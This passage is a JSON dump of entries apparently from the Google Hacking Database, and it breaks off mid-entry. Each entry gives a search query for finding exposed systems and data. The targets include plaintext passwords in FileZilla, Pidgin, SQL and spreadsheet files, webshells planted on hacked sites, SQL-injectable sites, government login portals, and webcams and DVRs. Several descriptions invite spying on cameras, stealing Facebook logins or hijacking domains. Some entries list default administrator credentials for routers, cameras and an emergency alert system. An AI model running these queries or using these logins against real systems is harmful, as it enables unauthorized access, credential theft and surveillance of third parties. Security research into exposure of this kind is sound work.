"inurl:wp-content/plugins/age-verification/age-verification.php", "long description": "Wordpress Age Verification Pluginhttp://www.exploit-db.com/exploits/18350", "submited": "2012-01-10", "request": "inurl:wp-content/plugins/age-verification/age-verification.php", "id": 3775}, {"short description": "intitle:\"HtmlAnvView:D7B039C1\"", "long description": "This dork finds Wireless Security/Webcams that are accessible from theweb. The interesting part is that for some reason these cameras do notgenerally allow users to remove/change the default administrativeusername and pass. So in most cases you can view any camera that showsup in the google search.Default Username: admin01Default Password:  000000111111999999Author: Paul White", "submited": "2012-05-15", "request": "intitle:\"HtmlAnvView:D7B039C1\"", "id": 3776}, {"short description": "intext:\"~~Joomla1.txt\" title:\"Index of /\"", "long description": "intext:\"~~Joomla1.txt\" title:\"Index of /\"Get all server configs filesDiscovered by alsa7r", "submited": "2012-05-15", "request": "intext:\"~~Joomla1.txt\" title:\"Index of /\"", "id": 3777}, {"short description": "\"Welcome to Sitecore\" + \"License Holder\"", "long description": "Sitecore CMS detection.", "submited": "2012-05-15", "request": "\"Welcome to Sitecore\" + \"License Holder\"", "id": 3778}, {"short description": "intitle:\"-N3t\" filetype:php undetectable", "long description": "intitle:\"-N3t\" filetype:php undetectableSearch WebShell indexed on a page.--Joel Campusano Rojas.632 161 62@joelcampusanoIngeniero Civil en Informatica.", "submited": "2012-05-15", "request": "intitle:\"-N3t\" filetype:php undetectable", "id": 3779}, {"short description": "?intitle:index.of?\".mysql_history\"", "long description": "Find some juicy info in .mysql_history filesenjoybastich", "submited": "2012-05-15", "request": "?intitle:index.of?\".mysql_history\"", "id": 3780}, {"short description": "intitle:awen+intitle:asp.net", "long description": "Hi,This google dork exposes any already uploaded asp.net shells which areavailable in BackTrack.http://www.google.com/search?q=intitle:awen+intitle:asp.netThanks,Sagar Belure", "submited": "2012-05-15", "request": "intitle:awen+intitle:asp.net", "id": 3781}, {"short description": "\"mailing list memberships reminder\"", "long description": "Hi,By default, while subscribing to a mailing list on a website, runningMailman (GNU) for mailing list management, the user has got options tomanage his/her subscription options.There is an option of getting password reminder email for this listonce in a month.And, by default, this option is set to Yes.Along with sending the password reminder mail in *plain text* to theusers, it gets archived on the sites too.Thanks,Sagar Belure", "submited": "2012-05-15", "request": "\"mailing list memberships reminder\"", "id": 3782}, {"short description": "intext:\"Thank you for your purchase/trial of ALWIL Software products.:\"", "long description": "This dork can fetch you Avast product licenses especially Avast Antiviruses, including Professional editions  ;)Author: gr00ve_hack3rwww.gr00ve-hack3r.com", "submited": "2012-05-15", "request": "intext:\"Thank you for your purchase/trial of ALWIL Software products.:\"", "id": 3783}, {"short description": "inurl:\"tiki-index.php\" filetype:php \"This is TikiWiki 1.9\"", "long description": "The server vulnerable to =&gt; CVE 2006-4602", "submited": "2012-05-15", "request": "inurl:\"tiki-index.php\" filetype:php \"This is TikiWiki 1.9\"", "id": 3784}, {"short description": "inurl:\"*.php?*=*.php\" intext:\"Warning: include\" -inurl:.html -site:\"php.net\" -site:\"stackoverflow.com\" -inurl:\"*forums*\"", "long description": "PHP Error Messages", "submited": "2012-05-15", "request": "inurl:\"*.php?*=*.php\" intext:\"Warning: include\" -inurl:.html -site:\"php.net\" -site:\"stackoverflow.com\" -inurl:\"*forums*\"", "id": 3785}, {"short description": "filetype:cfg \"radius\" (pass|passwd|password)", "long description": "Find config files with radius configs and passwords and secrets...LoveBastich", "submited": "2012-05-15", "request": "filetype:cfg \"radius\" (pass|passwd|password)", "id": 3786}, {"short description": "inurl:Settings.aspx intitle:Beyond TV", "long description": "Beyond TV gives you the capability to turn your PC into a high quality,digital video recorder (DVR). Most people use it for cable TV so thatthey don't have to spend rent money on a low end quality hardware DVRfrom their cable company. It's default config has no password orusername enabled. Very bad for people who connect their PCs directly totheir modems. I have Beyond TV and I was curious on how secure it is.", "submited": "2012-05-15", "request": "inurl:Settings.aspx intitle:Beyond TV", "id": 3787}, {"short description": "inurl:\"cgi-bin/webcgi/main\"", "long description": "inurl:\"cgi-bin/webcgi/main\"This dork finds indexed public facing Dell Remote Access Card.-n17r0u6", "submited": "2012-08-21", "request": "inurl:\"cgi-bin/webcgi/main\"", "id": 3788}, {"short description": "inurl:\"phpmyadmin/index.php\" intext:\"[ Edit ] [ Create PHP Code ] [ Refresh ]\"", "long description": "This dork finds unsecured databases", "submited": "2012-08-21", "request": "inurl:\"phpmyadmin/index.php\" intext:\"[ Edit ] [ Create PHP Code ] [ Refresh ]\"", "id": 3789}, {"short description": "inurl:\"passes\" OR inurl:\"passwords\" OR inurl:\"credentials\" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff", "long description": "Hack the $cr1pt kiddies.There are a lot of Phishing pages hosted on internet , this dork willprovide you with their password files. Clean and Simplegr00ve_hack3rwww.gr00vehack3r.wordpress.com", "submited": "2012-08-21", "request": "inurl:\"passes\" OR inurl:\"passwords\" OR inurl:\"credentials\" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff", "id": 3790}, {"short description": "filetype:docx Domain Registrar $user $pass", "long description": "Dork :-  *filetype:docx Domain Registrar $user $pass*Use :- *To find domain login password for Registrar (can Hijack Domain)Submitted by : G00g!3 W@rr!0r*", "submited": "2012-08-21", "request": "filetype:docx Domain Registrar $user $pass", "id": 3791}, {"short description": "inurl:/app_dev.php/login \"Environment\"", "long description": "Search for login screen in web aplications developed with Symfony2 in a development environmentDaniel Maldonadohttp://caceriadespammers.com.ar", "submited": "2012-08-21", "request": "inurl:/app_dev.php/login \"Environment\"", "id": 3792}, {"short description": "intitle:\"hp laserjet\" inurl:info_configuration.htm", "long description": "HP LaserJet printers", "submited": "2012-08-21", "request": "intitle:\"hp laserjet\" inurl:info_configuration.htm", "id": 3793}, {"short description": "filetype:avastlic", "long description": "Lots of Avast Licenses .Author : gr00ve_hack3rwww.gr00vehack3r.wordpress.com", "submited": "2012-08-21", "request": "filetype:avastlic", "id": 3794}, {"short description": "intitle:\"Log In\" \"Access unsecured content without logging in\"", "long description": "iOmega Storcenter login page:intitle:\"Log In\" \"Access unsecured content without logging in\"Greetings,Alrik", "submited": "2012-08-21", "request": "intitle:\"Log In\" \"Access unsecured content without logging in\"", "id": 3795}, {"short description": "Please-logon \"intitle:zarafa webaccess \"", "long description": "Zarafa Webaccess logon pages.Greetings,Alrik.", "submited": "2012-08-21", "request": "Please-logon \"intitle:zarafa webaccess \"", "id": 3796}, {"short description": "\"CHARACTER_SETS\" \"COLLATION_CHARACTER_SET_APPLICABILITY\"", "long description": "\"CHARACTER_SETS\"+\"COLLATION_CHARACTER_SET_APPLICABILITY\"find sql injectable sitediscoverd by shinrisama", "submited": "2012-08-21", "request": "\"CHARACTER_SETS\" \"COLLATION_CHARACTER_SET_APPLICABILITY\"", "id": 3797}, {"short description": "intitle:\"DVR+Web+Client\"", "long description": "This dork will find most Linux-based DVR web clients that are accessible tothe web and through SSH. Linux-based DVR web clients are login portals forsurveillance web cameras wherein you can spy in other peoples cameras.*Default Usernames:* admin, guest, root*Default Passwords:* admin, guest, root*Author:* shipcode", "submited": "2012-08-21", "request": "intitle:\"DVR+Web+Client\"", "id": 3798}, {"short description": "site*.*.*/webalizer intitle:\"Usage Statistics\"", "long description": "Shows usage statistics of sites. Includes monthy reports on the IP addresses, user agents, and more, of the viewers of the sites, the most active first.", "submited": "2012-08-21", "request": "site*.*.*/webalizer intitle:\"Usage Statistics\"", "id": 3799}, {"short description": "intext:\"You may also donate through the Moneybookers account mb@dd-wrt\"", "long description": "Still find alot of equipment running v24 sp1", "submited": "2012-08-21", "request": "intext:\"You may also donate through the Moneybookers account mb@dd-wrt\"", "id": 3800}, {"short description": "intext:charset_test= email= default_persistent=", "long description": "find facebook email and password  ;)", "submited": "2012-08-21", "request": "intext:charset_test= email= default_persistent=", "id": 3801}, {"short description": "'apc info' 'apc.php?SCOPE='", "long description": "This dork will locate Unsecured PHP APC Installations.With regards,Shubham Mittal(Hack Planet Technologies)http://hackplanet.in", "submited": "2012-08-21", "request": "&#039;apc info&#039; &#039;apc.php?SCOPE=&#039;", "id": 3802}, {"short description": "intext: intext: intext: intext: intext:", "long description": "More than 100k sites affectedIt will show asp sites that are vulnerable to sql injection(These links actually show pages which are attacked by mass SqlInjection...which means they are vulnerable to sql Injection)#Author-----  pgolechaPalash Golechatwitter- @pgolecha12", "submited": "2012-08-21", "request": "intext: intext: intext: intext: intext:", "id": 3803}, {"short description": "ext:xml (\"mode_passive\"|\"mode_default\")", "long description": "OffSec:So the dork is:ext:xml (\"mode_passive\"|\"mode_default\")This dork finds Filezilla XML files. To be more specific;- recentservers.xml- sitemanager.xml- filezilla.xmlThese files contain clear text usernames and passwords. They also contain the hostname or IP to connect to as well as the port. Most of these results will be for FTP however, you can also get port 22 to SSH in. This dork of course can be modified to target a specific website by appending site:whateversite.com. You can also look for a specific username like root by appending \"root\" to the dork.Regards,necrodamushttp://www.twitter.com/necrodamus2600http://www.photobucket.com/profile/necrodamus2600", "submited": "2012-11-02", "request": "ext:xml (\"mode_passive\"|\"mode_default\")", "id": 3804}, {"short description": "filetype:xls \"username | password\"", "long description": "filetype:xls \"username | password\" This search reveals usernames and/or passwords of the xls documents.by Stakewinner00", "submited": "2012-11-02", "request": "filetype:xls \"username | password\"", "id": 3805}, {"short description": "inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"", "long description": "Dork: inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"Use this dork to find root directory of CKFinder (all versions) withckfinder.html file (used to upload, modify and delete files on the server)Submitted by: CodiObert", "submited": "2012-11-02", "request": "inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"", "id": 3806}, {"short description": "intitle:Priv8 SCR", "long description": "I am Un0wn_XSymlink User configsintitle:Priv8 SCR", "submited": "2012-11-02", "request": "Re: intitle:Priv8 SCR", "id": 3807}, {"short description": "intitle:C0ded By web.sniper", "long description": "User &amp; Domain || SymlinkUsing this dork you can find the User and the Domains of the Server...intitle:C0ded By web.sniperAuthor: Un0wn_X", "submited": "2012-11-02", "request": "intitle:C0ded By web.sniper", "id": 3808}, {"short description": "inurl:.com/configuration.php-dist", "long description": "Finds the configuration files of the PHP Database on the server.ByChintan GurjarRahul Tygi", "submited": "2012-11-02", "request": "inurl:.com/configuration.php-dist", "id": 3809}, {"short description": "intitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\"", "long description": "Pyxis Mobile Test Pageintitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\"", "submited": "2012-11-02", "request": "intitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\"", "id": 3810}, {"short description": "inurl:finger.cgi", "long description": "FingerSubmitted by: Christy Philip Mathew", "submited": "2012-11-02", "request": "inurl:finger.cgi", "id": 3811}, {"short description": "inurl:32400/web/index.html", "long description": "Submitting this for the GHDB.  These are web accessible Plex Media Serverswhere you can watch/listen to other people's media collections.FYI", "submited": "2012-11-02", "request": "inurl:32400/web/index.html", "id": 3812}, {"short description": "\"parent directory\" proftpdpasswd intitle:\"index of\" -google", "long description": "This dork is based on this: http://www.exploit-db.com/ghdb/1212/but improved cause that is useless, instead of this:\"parent directory\" proftpdpasswd intitle:\"index of\" -googleBest regards,Nemesis", "submited": "2012-11-02", "request": "\"parent directory\" proftpdpasswd intitle:\"index of\" -google", "id": 3813}, {"short description": "intitle:\"dd-wrt info\" intext:\"Firmware: DD-WRT\"", "long description": "This dork finds web interfaces of various routers using custom firmware DD-WRT.Default login: rootDefault password: admingreetings, uA", "submited": "2012-11-02", "request": "intitle:\"dd-wrt info\" intext:\"Firmware: DD-WRT\"", "id": 3814}, {"short description": "inurl:\"/level/13|14|15/exec/\"", "long description": "inurl:\"/level/13|14|15/exec/\"Cisco IOS HTTP Auth Vulnerability .. Command before exec/ . Exampleexec/-/?", "submited": "2012-11-02", "request": "inurl:\"/level/13|14|15/exec/\"", "id": 3815}, {"short description": "inurl:\"r00t.php\"", "long description": "This dork finds websites that were hacked, backdoored and contains theirsystem information e.g: Linux web.air51.ru 2.6.32-41-server #89-UbuntuSMP Fri Apr 27 22:33:31 UTC 2012 x86_64.Jay Turla a.k.a shipcode", "submited": "2012-11-02", "request": "Re: inurl:\"r00t.php\"", "id": 3816}, {"short description": "inurl:\"/dbman/default.pass\"", "long description": "A path to a DES encrypted password for DBMan (http://www.gossamer-threads.com/products/archive.html)  ranging from Guestto Admin account, this is often found coupled with cgi-telnet.pl (http://www.rohitab.com/cgi-telnet) which provides an admin login, bydefault and the password provided by DBMan's path /dbman/default.passI have already posted this to packetstorm on June 7th 2004, calledcgitelnetdbman (http://packetstormsecurity.org/files/29530/cgitelnetdbman.pdf.html)The 'Dork' is *inurl:\"/dbman/default.pass\" *Lawrence Lavigne (ratdance)-suidrewt", "submited": "2012-11-02", "request": "inurl:\"/dbman/default.pass\"", "id": 3817}, {"short description": "inurl:\"InfoViewApp/logon.jsp\"", "long description": "Google Hacking*SAP Business Object 3.1 XI*inurl:\"InfoViewApp/logon.jsp\"twitter@firebitsbr", "submited": "2012-11-02", "request": "inurl:\"InfoViewApp/logon.jsp\"", "id": 3818}, {"short description": "inurl:phpliteadmin.php", "long description": "The default password is 'admin'", "submited": "2012-11-02", "request": "inurl:phpliteadmin.php", "id": 3819}, {"short description": "inurl:\"Orion/SummaryView.aspx\" intext:\"Orion Core\"", "long description": "Hello,Enumerate Solarwinds Orion network monitoring portals.  In some cases, theportal can be accessed without authenticating.-Sean", "submited": "2012-11-02", "request": "inurl:\"Orion/SummaryView.aspx\" intext:\"Orion Core\"", "id": 3820}, {"short description": "allinurl:\"User_info/auth_user_file.txt\"", "long description": "Google dork for find user info and configuration password of DCForumallinurl:\"User_info/auth_user_file.txt\"- Ajith Kp", "submited": "2012-11-05", "request": "allinurl:\"User_info/auth_user_file.txt\"", "id": 3821}, {"short description": "intext:\"Fatal error: Class 'Red_Action' not found in\"", "long description": "Dork to find Plugin errors in wordpress websitesDork - intext:\"Fatal error: Class 'Red_Action' not found in\"", "submited": "2012-12-06", "request": "intext:\"Fatal error: Class &#039;Red_Action&#039; not found in\"", "id": 3822}, {"short description": "inurl:newsnab/www/ automated.config.php", "long description": "Usenet Accounts from Newsnab configsinurl:newsnab/www/  automated.config.phpAuthor: rmccurdy.comyay free newsgroup access !***********************************************************************The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email are subject to the terms and conditions expressed in the governing KPMG client engagement letter.***********************************************************************", "submited": "2012-12-06", "request": "inurl:newsnab/www/ automated.config.php", "id": 3823}, {"short description": "inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls", "long description": "--nitish mehta", "submited": "2012-12-31", "request": "inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls", "id": 3824}, {"short description": "you really should fix this security hole by setting a password for user '.root'. inurl:/phpmyadmin intitle:localhost", "long description": "Gives sites with default username root and no password--nitish mehta", "submited": "2012-12-31", "request": "you really should fix this security hole by setting a password for user &#039;.root&#039;. inurl:/phpmyadmin intitle:localhost", "id": 3825}, {"short description": "intext:SQL syntax &amp; inurl:index.php?=id &amp; inurl:gov &amp; inurl:gov", "long description": "# Exploit Title: SQLI Exploit# Google Dork: intext:SQL syntax &amp; inurl:index.php?=id &amp; inurl:gov &amp;inurl:gov# Date: 25/December/2012# Exploit Author: BeastarStealacar# Vendor Homepage: http://devil-zone.net/", "submited": "2012-12-31", "request": "intext:SQL syntax &amp; inurl:index.php?=id &amp; inurl:gov &amp; inurl:gov", "id": 3826}, {"short description": "inurl:/wp-content/w3tc/dbcache/", "long description": "- Jay Townsend", "submited": "2012-12-31", "request": "inurl:/wp-content/w3tc/dbcache/", "id": 3827}, {"short description": "runtimevar softwareVersion=", "long description": "Hits: 807Config file from Thomson home routers, sometimes it contains password's anduser's encryptedContains ACS servers info from ISP's", "submited": "2013-02-05", "request": "runtimevar softwareVersion=", "id": 3828}, {"short description": "site:login.*.*", "long description": "DORK:site:login.*.*Description: Allow User To ViewLogin Panel Of Many WebSites..Author:MTKDATED: 13-1-1", "submited": "2013-02-05", "request": "site:login.*.*", "id": 3829}, {"short description": "inurl:/control/userimage.html", "long description": "Mobotix webcam search. yet another newer search", "submited": "2013-02-05", "request": "inurl:/control/userimage.html", "id": 3830}, {"short description": "ext:xml (\"proto='prpl-'\" | \"prpl-yahoo\" | \"prpl-silc\" | \"prpl-icq\")", "long description": "*Google Search:*https://www.google.com/search?q=ext:xml%20(%22proto='prpl-'%22%20|%20%22prpl-yahoo%22%20|%20%22prpl-silc%22%20|%20%22prpl-icq%22)*Description:*Find Accounds and Passwords from Pidgin Users.Google limit queries to 32 words so it?s impossible to search for allAccount-Types in one query!List of all Params: Feel free to build your own search query.proto='prpl-'; prpl-silc; prpl-simple; prpl-zephyr; prpl-bonjour;prpl-qq; prpl-meanwhile; prpl-novell; prpl-gg; prpl-myspace; prpl-msn;prpl-gtalk; prpl-icq; prpl-aim; prpl-yahoo; prpl-yahoojp; prpl-yah;prpl-irc; prpl-yabber*Author:* la.usch.io", "submited": "2013-02-05", "request": "ext:xml (\"proto=&#039;prpl-&#039;\" | \"prpl-yahoo\" | \"prpl-silc\" | \"prpl-icq\")", "id": 3831}, {"short description": "ext:gnucash", "long description": "*Google Search:*http://www.google.com/search?q=ext:gnucash*Description:*Find Gnucash Databases containing juicy info.*Author:*http://la.usch.iohttps://www.twitter.com/la_usch--------------------------------------------------------CheersL@uschWeb: http://la.usch.ioTwitter: https://www.twitter.com/la_usch", "submited": "2013-02-05", "request": "ext:gnucash", "id": 3832}, {"short description": "filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect", "long description": "Aggregates previous mysql_(p)connect google dorks and adds a new filetype.Searches common file extensions used as backups by PHP developers. Theseextensions are normally not interpreted as code by their server, so theirdatabase connection credentials can be viewed in plaintext.- Andy G - twitter.com/vxhex", "submited": "2013-02-05", "request": "filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect", "id": 3833}, {"short description": "filetype:config inurl:web.config inurl:ftp", "long description": "This google dork to find sensitive information of MySqlServer , \"uid, andpassword\" in web.config through ftp..filetype:config  inurl:web.config   inurl:ftp-Altamimi", "submited": "2013-04-09", "request": "filetype:config inurl:web.config inurl:ftp", "id": 3834}, {"short description": "allintext: \"Please login to continue...\" \"ZTE Corporation. All rights reserved.\"", "long description": "Reported by: Jasper Briels", "submited": "2013-04-09", "request": "allintext: \"Please login to continue...\" \"ZTE Corporation. All rights reserved.\"", "id": 3835}, {"short description": "\"index of\" inurl:root intitle:symlink", "long description": "Google Dork: index of\" inurl:root intitle:symlinkSteal Others SymlinkAuthor: Un0wn_X", "submited": "2013-04-09", "request": "\"index of\" inurl:root intitle:symlink", "id": 3836}, {"short description": "\"index of\" inurl:sym", "long description": "Google Dork: \"index of\" inurl:symYou can Steal the symlinks of other ServersAuthor: Un0wn_X", "submited": "2013-04-09", "request": "\"index of\" inurl:sym", "id": 3837}, {"short description": "inurl:\"php?id=\" intext:\"DB_Error Object \"", "long description": "Description: Files containing juicy infoAuthor:ruben_linux", "submited": "2013-04-09", "request": "inurl:\"php?id=\" intext:\"DB_Error Object \"", "id": 3838}, {"short description": "ext:sql intext:@hotmail.com intext :password", "long description": "By ,NItish Mehta ,www.illuminativeworks.com/bloghttps://www.facebook.com/illuminativeworksIlluminative Works(CEO &amp; Founder )", "submited": "2013-04-09", "request": "ext:sql intext:@hotmail.com intext :password", "id": 3839}, {"short description": "inurl:advsearch.php?module= &amp; intext:sql syntax", "long description": "Exploit Title : SQLI ExploitGoogle Dork : inurl:advsearch.php?module= &amp; intext:sql syntaxDate : 19/3/2013Exploit Author : Scott SturrockEmail : f00bar'at'linuxmail'dot'org", "submited": "2013-04-09", "request": "inurl:advsearch.php?module= &amp; intext:sql syntax", "id": 3840}, {"short description": "intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx", "long description": "Category : Pages containing login portalsDescription : Dork for finding sensitive login portalsDork : intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspxLink : https://encrypted.google.com/#hl=en&amp;output=search&amp;sclient=psy-ab&amp;q=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&amp;oq=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&amp;gs_l=hp.3...852.852.0.983.1.1.0.0.0.0.121.121.0j1.1.0...0.0...1c.1.7.psy-ab.664iAsY450k&amp;pbx=1&amp;bav=on.2,or.r_qf.&amp;bvm=bv.44011176,d.d2k&amp;fp=7b93b16efbccc178&amp;biw=1362&amp;bih=667Date : 20/3/2013Exploit Author: Scott SturrockEmail: f00bar'at'linuxmail'dot'org", "submited": "2013-04-09", "request": "intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx", "id": 3841}, {"short description": "intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx", "long description": "Category : Pages containing login portalsDescription : Dork for finding government login portalsDork : intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspxLink : https://encrypted.google.com/#hl=en&amp;output=search&amp;sclient=psy-ab&amp;q=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&amp;oq=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&amp;gs_l=hp.3...894.894.0.1059.1.1.0.0.0.0.116.116.0j1.1.0...0.0...1c.1.7.psy-ab.lvawmQ4rKqA&amp;pbx=1&amp;bav=on.2,or.r_qf.&amp;bvm=bv.44011176,d.d2k&amp;fp=7b93b16efbccc178&amp;biw=1362&amp;bih=667Date : 20/3/2013Author : Scott SturrockEmail: f00bar'at'linuxmail'dot'org", "submited": "2013-04-09", "request": "intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx", "id": 3842}, {"short description": "intext:Computer Misuse Act inurl:login.aspx", "long description": "Category : Pages containing login portalsDescription : Dork for finding sensitive login portalsDork : intext:Computer Misuse Act inurl:login.aspxLink : https://encrypted.google.com/#hl=en&amp;output=search&amp;sclient=psy-ab&amp;q=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&amp;oq=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&amp;gs_l=hp.3...1565.1565.0.1684.1.1.0.0.0.0.105.105.0j1.1.0...0.0...1c.1.7.psy-ab.ZaZN16Ureds&amp;pbx=1&amp;bav=on.2,or.r_qf.&amp;bvm=bv.44011176,d.ZWU&amp;fp=7b93b16efbccc178&amp;biw=1362&amp;bih=667Date : 20/3/2013Author : Scott SturrockEmail: f00bar'at'linuxmail'dot'org", "submited": "2013-04-09", "request": "intext:Computer Misuse Act inurl:login.aspx", "id": 3843}, {"short description": "filetype:ini \"This is the default settings file for new PHP installations\"", "long description": "Finds PHP configuration files (php.ini) that have been placed in indexedfolders. Php.ini defines a PHP installation's behavior, including magicquotes, register globals, and remote file operations. This can be usefulfor knowing which attacks (such as RFI) are possible against the server.- Andy G - twitter.com/vxhex", "submited": "2013-04-22", "request": "filetype:ini \"This is the default settings file for new PHP installations\"", "id": 3844}, {"short description": "filetype:php -site:php.net intitle:phpinfo \"published by the PHP Group\"", "long description": "Tries to reduce false positive results from similar dorks. Finds pagescontaining output from phpinfo(). This function is used to debug and testPHP installations by listing versions, extensions, configurations, serverinformation, file system information, and execution environment. The outputof this function should not be included in production environments andcertain versions of this function are vulnerable to reflected XSS attacks.- Andy G - twitter.com/vxhex", "submited": "2013-04-22", "request": "filetype:php -site:php.net intitle:phpinfo \"published by the PHP Group\"", "id": 3845}, {"short description": "inurl:/voice/advanced/ intitle:Linksys SPA configuration", "long description": "This allows you to look at linksys VOIP Router Config pages.", "submited": "2013-04-22", "request": "inurl:/voice/advanced/ intitle:Linksys SPA configuration", "id": 3846}, {"short description": "inurl:\"/root/etc/passwd\" intext:\"home/*:\"", "long description": "inurl:\"/root/etc/passwd\" intext:\"home/*:\"", "submited": "2013-04-22", "request": "inurl:\"/root/etc/passwd\" intext:\"home/*:\"", "id": 3847}, {"short description": "intext:\"root:x:0:0:root:/root:/bin/bash\" inurl:*=/etc/passwd", "long description": "Author: ./tic0 | Izzudin al-Qassam Cyber Fighter", "submited": "2013-04-22", "request": "intext:\"root:x:0:0:root:/root:/bin/bash\" inurl:*=/etc/passwd", "id": 3848}, {"short description": "filetype:sql insite:pass &amp;&amp; user", "long description": "Google Dork: filetype:sql insite:pass &amp;&amp; userWe Can get login username and password details from .sql file.Author: BlacK_WooD", "submited": "2013-04-22", "request": "filetype:sql insite:pass &amp;&amp; user", "id": 3849}, {"short description": "Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.", "long description": "# Category: FTP Login Portals# Description : Dork for finding FTP Login portals# Google Dork: Serv-U Copyright 1995-2013 Rhino Software, Inc. AllRights.Reserved.# Date: 16/04/2013# Exploit Author: Arul Kumar.V# Vendor Homepage: www.serv-u.com#  Email : hackerarul@gmail.comThank you", "submited": "2013-04-22", "request": "Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.", "id": 3850}, {"short description": "intext:(see in orig)", "long description": "Google search:intext:(see in orig)DORK:(see in orig)Description:Unrestricted File Upload(Allow User To Upload malicious Files)Author:Bhavya ShuklaTwitter:@bhavya_shukla_", "submited": "2013-04-22", "request": "intext:(see in orig)", "id": 3851}, {"short description": "allintext: /iissamples/default/", "long description": "Searching for  \"allintext: /iissamples/default/\"  may provide interestinginformation about a mis-configured .asp server including raw source codefor asp, directory structure and the IIS version ( especially useful whenIIS is running on NT 4.0)the result provides a way to further explore directory structure for juicyinfo.Oleg.", "submited": "2013-04-23", "request": "allintext: /iissamples/default/", "id": 3852}, {"short description": "intitle:\"VNC Viewer for Java\"", "long description": "VNC Viewer for Java~4N6 Security~", "submited": "2013-08-08", "request": "intitle:\"VNC Viewer for Java\"", "id": 3853}, {"short description": "inurl:\"zendesk.com/attachments/token\" site:zendesk.com", "long description": "zendesk is good ticketing system . It has thousands of clients. with theabove dork  you can see the clients internal file attachments of thetickets .These file can be opened by anyone because they are not maintaining anyauthentication token for this attachmentsInternal source codes, doubts, ip's , passwords, can be disclosed in theattachments", "submited": "2013-08-08", "request": "inurl:\"zendesk.com/attachments/token\" site:zendesk.com", "id": 3854}, {"short description": "inurl:\"dasdec/dasdec.csp\"", "long description": "inurl:\"dasdec/dasdec.csp\"DASDEC II Emergency Alert SystemUser Manual: http://www.digitalalertsystems.com/pdf/DASDEC_II_manual.pdfDefault username: AdminDefault password: dasdec", "submited": "2013-08-08", "request": "inurl:\"dasdec/dasdec.csp\"", "id": 3855}, {"short description": "\"information_schema\" filetype:sql", "long description": "Dork: \"information_schema\" filetype:sqlBy: Cr4t3r", "submited": "2013-08-08", "request": "\"information_schema\" filetype:sql", "id": 3856}, {"short description": "intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1", "long description": "# Exploit Title: google dork for apache directory listing by url edit# Google Dork: intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1in this query you see that text file but by url we can travel in paren directory# Date: 11/7/2013# Exploit Author: james love india# Tested on: windows xp sp2", "submited": "2013-08-08", "request": "intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1", "id": 3857}, {"short description": "intitle:index.of intext:.bash_history", "long description": "the GHDB on subject (intitle:index.of intext:.bash_history) finds allhome users directory path indexed. I've test it and google return 943results!-Andrea Menin", "submited": "2013-08-08", "request": "intitle:index.of intext:.bash_history", "id": 3858}, {"short description": "intitle:\"Cisco Integrated Management Controller Login\"", "long description": "intitle:\"Cisco Integrated Management Controller Login\"The Cisco Integrated Management Controller (CIMC) is the management servicefor the C-Series servers. CIMC is built into the motherboard. This Googledork searches for the CIMC GUI login portal for remote access.ax_", "submited": "2013-08-08", "request": "intitle:\"Cisco Integrated Management Controller Login\"", "id": 3859}, {"short description": "inurl:/secure/Dashboard.jspa intitle:\"System Dashboard\"", "long description": "Finds login pages and system dashboards for Atlassian's JIRA.- Andy G - twitter.com/vxhex", "submited": "2013-08-08", "request": "inurl:/secure/Dashboard.jspa intitle:\"System Dashboard\"", "id": 3860}, {"short description": "\"Welcome to phpMyAdmin\" + \"Username:\" + \"Password:\" + \"Language:\" + \"Afrikaans\"", "long description": "Finds cPanel login pages.- Andy G - twitter.com/vxhex", "submited": "2013-08-08", "request": "\"Welcome to phpMyAdmin\" + \"Username:\" + \"Password:\" + \"Language:\" + \"Afrikaans\"", "id": 3861}, {"short description": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin", "long description": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadminview phpMyAdmin of web sitesAuthor: Un0wn_XFollow: @UnownSecE-Mail: unownsec@gmail.com", "submited": "2013-08-08", "request": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin", "id": 3862}, {"short description": "inurl:fluidgalleries/dat/login.dat", "long description": "Works with every single fluidgalleries portofolio sites. Just decrypt the MD5 hash and login onto url.extension/admin.php with the username from the search result and with the decrypted MD5 hash. Dork by Kraze (kraze@programmer.net)", "submited": 